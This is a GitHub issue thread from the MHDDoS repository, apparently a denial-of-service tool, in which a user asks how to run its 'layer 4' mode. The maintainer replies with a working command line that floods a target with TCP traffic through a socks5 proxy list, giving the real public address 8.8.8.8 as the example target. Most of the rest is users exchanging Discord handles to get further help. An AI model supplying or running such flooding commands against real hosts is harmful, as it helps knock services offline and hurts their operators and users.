### ISSUE TITLE
help

### ISSUE THREAD

**Issue by N1by33** [MHProDev/MHDDoS#10]
how to use layer 4?
I liked layer 7 very good, continue

**Comment by MHProDev** [comment]
```python3 start.py tcp https://8.8.8.8:80 5 1000 socks5.txt 100 100```
```python3 start.py <method>https://<ip>:<port> 5 1000 socks5.txt 100 100```

:)

**Comment by N1by33** [comment]
I still can't do it, can you check what I'm doing wrong?

![help](https://user-images.githubusercontent.com/80843446/111506133-39f65100-8741-11eb-873e-df62406e02d3.JPG)

**Comment by MHProDev** [comment]
contact me in telegram or discord  : )
@MH_ProDev_IR
MH_ProDev#5642

**Comment by N1by33** [comment]
![image](https://user-images.githubusercontent.com/80843446/111512334-8cd30700-8747-11eb-8a93-f93c904872be.png)
33.#5972

**Comment by N1by33** [comment]
Can you add me? because I can't add you

**Comment by ItzNickM8** [comment]
I have this issue too

**Comment by MHProDev** [comment]
comment username

**Comment by N1by33** [comment]
33.#5972

**Comment by N1by33** [comment]
I'm waiting bro

**Comment by MHProDev** [comment]
fixed
